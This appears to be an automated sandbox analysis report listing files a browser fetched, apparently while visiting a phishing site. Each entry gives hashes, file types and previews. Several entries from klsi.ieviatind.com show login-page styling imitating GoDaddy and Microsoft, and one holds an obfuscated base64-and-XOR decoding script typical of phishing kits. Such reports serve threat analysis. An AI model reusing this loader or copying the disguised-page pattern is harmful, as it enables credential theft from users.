                                                Preview:L..................F.@.. ...$+.,....n=......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YA.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-YI.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-YI.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-YI............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-YJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............`!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2689
                                                Entropy (8bit):4.005851587367079
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:65F25CA35019A673F51149A02528314B
                                                SHA1:4704029EC0DCA74CD2E570A45A86819A4407E551
                                                SHA-256:48AE0EEE1FF7479B3090F794984288A3E95F09FDB76BD1B812AD8C04606D111A
                                                SHA-512:C2CEBB6792F3B43F6C460285EFCF665C4A9803884A77C4F52FD3981DB89EB6791800E461F3406D74AE877B10797334AB6D45A099A1E7D2E4A578744007561C08
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YA.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-YI.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-YI.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-YI............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............`!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 18:42:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9975396481278533
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B3A1F9AE863FAEE07CA17299B421382D
                                                SHA1:F68B1A0EE680BE99B1B677151B983EA5AA5DB058
                                                SHA-256:5E69F4C46D44DA259FC57FF1C7707254F71E06CC840FCA70D50013CF8ECB7B2E
                                                SHA-512:D8B4244493B7BDBDDBFD850754C211C401C5F7287DB6EAD7BF9AFB57AED86F9A1D5F01603E1CD3C7A206ABBB34707D64ABA008296875A10AC2E1BB7A8A19B114
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....q......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YA.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-YI.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-YI.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-YI............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-YJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............`!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 18:42:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.98614179744615
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:809808A377266CF95AF5526146DA9827
                                                SHA1:9A0627C32989BA74203014D40D17802BD2190A10
                                                SHA-256:CABE121AD32C8EEF97859A89D35623E6CBEA835D5AB94FCFE8C46DA6BC8FF19E
                                                SHA-512:1F76BFF382B4C50A81F189FEC0D14A97CB3BB4C6449F4EE74A22A919946D42D05E4A256D2F1D998F5D06018EFA651F2E78F571A1CE3FC3629A39960272C0BC49
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YA.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-YI.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-YI.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-YI............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-YJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............`!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 18:42:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):3.9939640223026585
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:51CA4C866289AB118AB1C0647DA01EFA
                                                SHA1:CC613B246D50E1888A37D04AFD23F5E28C3F259F
                                                SHA-256:C2495649B9CE67CE60A61C293AE336773E0CA215D97BC7A334F273FFB769A70C
                                                SHA-512:306BFA798B77A62F2FB8C75BC6289F6933B207F187F1C3E3C294B5CE0CE43EF5E63042E9304163755F3CED46D64199CAEF449F7F292114DFB347B846FA060C8E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....3w.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YA.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-YI.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-YI.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-YI............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-YJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............`!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):35786
                                                Entropy (8bit):5.058073854893359
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/xyK4cAGrsTFEgh30
                                                Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (47261)
                                                Category:downloaded
                                                Size (bytes):47262
                                                Entropy (8bit):5.3977431994288265
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D7BB07B6ECD6FB1A2E123203006C33BA
                                                SHA1:09CC76938FA366E40992880FF94ACCD8BE0C6640
                                                SHA-256:8EAE5159C56BF66C17E0CB002B25FC2E343F3E009DC2A39A7E230F08B7B8C672
                                                SHA-512:D87C6B675EF3F260CC86BD130F91A08F5D07D301F2A7B14778C5CCF42BF0D605957FF653CA53C57203A85AADFF5F66F3514342A35DFAA581FBAF57FC3B72D722
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.js
                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):120576
                                                Entropy (8bit):5.618034124459095
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:4821D2B5669A7CF91C938C4C98A820E8
                                                SHA1:0B32FDA90145B629D878BE57D295227E9A775573
                                                SHA-256:A986227846DFED85937A639CB68EE4574EEDF49DDE41A0979D3B19D1D5226FAD
                                                SHA-512:D31FBC7E1E7C1A1A0DAD0FB53FE6630DBC6301697E29745BB55C9377F177A4BCBAD3BB056C260538BEE4E00B3E5265B1DC6154372D2B7290D641405B81F6E836
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03T
                                                Preview:<script>..function pcvQGlymDY(BjHeBfddXZ, bpvOKMjAEr) {..let yXdstEPjuW = '';..BjHeBfddXZ = atob(BjHeBfddXZ);..let FFqrcezLPO = bpvOKMjAEr.length;..for (let i = 0; i < BjHeBfddXZ.length; i++) {.. yXdstEPjuW += String.fromCharCode(BjHeBfddXZ.charCodeAt(i) ^ bpvOKMjAEr.charCodeAt(i % FFqrcezLPO));..}..return yXdstEPjuW;..}..var ACwIwCLtuX = pcvQGlymDY(`RE5wBwstMyUhaRAbWSR2dGBJDD0VAxQkKRcNSEYsFk0KRUJFAhAFLUZiPnRpVEdVWC0RGQobPRoJEBc6WAZHaCYWHlUMJg9PXCEvEUoMCzxYB1U+LVkJGQ0kGgpQZGgbHwFEIRcYFDEnDEoYBSIdT1VoOBYZHBAgDgoULCEfDBAWLBYMUWg8FkoBDCxYGFs6JB1ESUstERkKaGVUVH9EaVhPCDsrCwMFEGkLHVd1ahEeARQ6QkAbKycdD1sOOA0KRjFmGgUYSyMJGlE6MVRZW1JnSEFZISZXAAZGd0RARys6EBoBWkRyTxRoaEUZFhYgCBsUOzoaV1cMPQwfR3JnVgkRCmcLAFcjLQ1EHAtmTEECZnhWGRoHIh0bGiEnVwccCmcSHBZ2dFYZFhYgCBsKRUJZSlVEdQsMRiE4DUoGFipFTVw8PAkZT0tmHwZAID0bRBYLJFcJUSY8VhgUCi0dF0RmIgpFBwElHQ5HLTtWDhoTJxQAVSxnD1pbUGdLQEYpJh0PDRRnFQZaZiIKSEtYZgsMRiE4DVR4bmlYTxR0OxoYHBQ9WBxGK3VbAgEQOQtVG2crHQQfF2cbA1s9LB8GFBYsVgxbJWcYABQcZhQGVjtnGhgMFD0XQl47Z01EREp4VwxG
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1400
                                                Entropy (8bit):7.808470583085035
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:333EE830E5AB72C41DD9126A27B4D878
                                                SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:data
                                                Category:downloaded
                                                Size (bytes):550905
                                                Entropy (8bit):5.666803401551392
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:C7BE68088B0A823F1A4C1F77C702D1B4
                                                SHA1:05D42D754AFD21681C0E815799B88FBE1FBABF4E
                                                SHA-256:4943E91F7F53318D481CA07297395ABBC52541C2BE55D7276ECDA152CD7AD9C3
                                                SHA-512:CB76505845E7FC0988ADE0598E6EA80636713E20209E1260EE4413423B45235F57CB0A33FCA7BAF223E829835CB76A52244C3197E4C0C166DAD9B946B9285222
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.gstatic.com/recaptcha/releases/EGbODne6buzpTnWrrBprcfAY/recaptcha__en.js
                                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var S=function(){return[function(q,y,d,h,l,A,G,V){if((q-((q>>((G=[26,"A","JT"],q|72)==q&&(d=[sC,VO],V=(h=Array.from(ee(vv)).find(function(v){return d.includes(v.autocomplete)&&v.type!=Wv&&v.value}))==y?void 0:h.value),1)&11)>=3&&(q-7&16)<9&&(A=h.u[h.u.length-y],l=OC(),A.Pj<=l&&(A.CB=d),h[G[1]]&&h[G[1 =A.CB||(A.CB===1?(h[G[1]]=y,h.Yu(A.Pj-l)):(h[G[1]]=d,h[G[2]]()))),5)|35)<q&&q-8<<1>=q)S[13](3,"label",this);return(q|7)>=-43&&(q|3)>>4<1&&(V=H[28](G[0],y,d,h)),V},function(q,y,d,h,l,A,G,V,v,e,a){return(((q|.1)&(a=[8,7,"O"],a[1]))>=0&&q>>1<12&&(h.P[a[2]]=y,v=[!0,100,1E3],U[36](2,v[1],"2fa","audio",36,h.u,d),h.u.P.I=h
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65447)
                                                Category:dropped
                                                Size (bytes):89501
                                                Entropy (8bit):5.289893677458563
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                Category:downloaded
                                                Size (bytes):28584
                                                Entropy (8bit):7.992563951996154
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:17081510F3A6F2F619EC8C6F244523C7
                                                SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/56aT0WQub9IFp9u67qoujWuSiuv55
                                                Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (5824)
                                                Category:downloaded
                                                Size (bytes):5829
                                                Entropy (8bit):5.787604940967452
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:3293506A72795C4C4B8EF453C2C981E4
                                                SHA1:8E1B77DB6DFCEE6ED3B68556C74A29D7BDE3D5AC
                                                SHA-256:3FE2578CA6EA648B2221100486909CAEF2EDAF6FE33898D737029C6A2C3F08C3
                                                SHA-512:9054B631A42CC940806BE8E6B5A240CAF2CF0CD95A9DB7767A3FC87EA859C214954CB32936272A77C0B67932D19AFBC0C8E107EB78C1584941D1BB4568B4651C
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                Preview:)]}'.["",["inside out 2 release date disney plus","2k25 patch notes","boeing workers strike","seattle seahawks","tropical storm gordon","alaska russian aircraft intercept","flappy bird game","macaroni cheese recall"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNzB4ZxINRm9vdGJhbGwgdGVhbTLeB2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFBYUNBTUFBQUF3b3FwOUFBQUFuMUJNVkVYLy8vOEFJa1NscmEvR3k4MmlxcTBBQURLdXRiY0FCamNBQURRQUFDNEFJVVNvckxXQmg1UUFBQ3NBQURZQUdUK2VvNndBRHpvQUZEeHZkNFpGVVdiajVlZDNmb3dBQUNjQUhVR3h0Ynkrd2NmYTNOK1BsYUFBQUNEMDlmWkNmemRlWjNnV0xFczJSRnhRVzI0cU9sWFEwdGNjUTBBQUl6dG1iMzhBQUJNQUJVVm11eWxjcWkwQUFFWUFFVUlBRDBSVG16RnJ4U1lBRlM0QUFBb0FBQnFxOGJza0FBQUI4VWxFUVZRNGphMlZpWTZiTUJDRzdTV3ViY0Q0NExSTkhNNlc3YkU5a3ZkL3RocmFMTGsyV3luOUpDUkFNNzluL2hrRUFQOFI5MkMraGNGakFwa2lET0VrU1FnaG
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):29
                                                Entropy (8bit):3.9353986674667634
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6FED308183D5DFC421602548615204AF
                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.google.com/async/newtab_promos
                                                Preview:)]}'.{"update":{"promos":{}}}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (23791), with no line terminators
                                                Category:downloaded
                                                Size (bytes):23791
                                                Entropy (8bit):5.1072229992803955
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:47289A0F6E78A5C3D0ED9F106B54C18D
                                                SHA1:EA7DD31AB9B7B5DEC4208BC99DA3E619603F30BB
                                                SHA-256:149AEFB00EC81D50A350C9800FDF3E35529386515B1FB9058AB083632D995447
                                                SHA-512:DF502318A12E569B89AF12636A56F1F6B5D86AE238CD79453B4A7AA84897D54C842D8FB6FB198ABAC22E362F8A1DE716D535D7A0325EB3105DECECAF7CF0BEED
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/12cFeiYN1EHHLqZimcdIs16712
                                                Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direc
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):7390
                                                Entropy (8bit):4.02755241095864
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
